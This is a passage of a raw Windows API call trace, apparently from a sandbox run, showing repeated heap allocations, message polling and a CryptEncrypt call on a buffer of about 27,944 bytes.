RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0209.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0209.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0209.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0209.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0209.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0209.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0209.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0209.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0209.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0209.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0209.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0209.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0209.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0209.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0209.673] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0209.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0209.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0209.673] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0209.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0209.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0209.674] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0209.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0209.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0209.674] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0209.675] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0209.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0209.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0209.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0209.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0209.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0209.675] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0209.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.675] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0209.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.675] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0209.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0209.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0209.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0209.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0209.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0209.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0209.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0209.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0209.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0209.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0209.677] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0209.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0209.677] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0209.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0209.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0209.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0209.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0209.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0209.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0209.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0209.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0209.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0209.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0209.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c80 [0209.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.680] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x6d22, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x6d28) returned 1 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0209.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0209.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0209.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0209.682] CharLowerBuffW (in: lpsz="byte[27944]", cchLength=0xb | out: lpsz="byte[27944]") returned 0xb [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0209.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0209.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d28) returned 0x2f387a8 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, 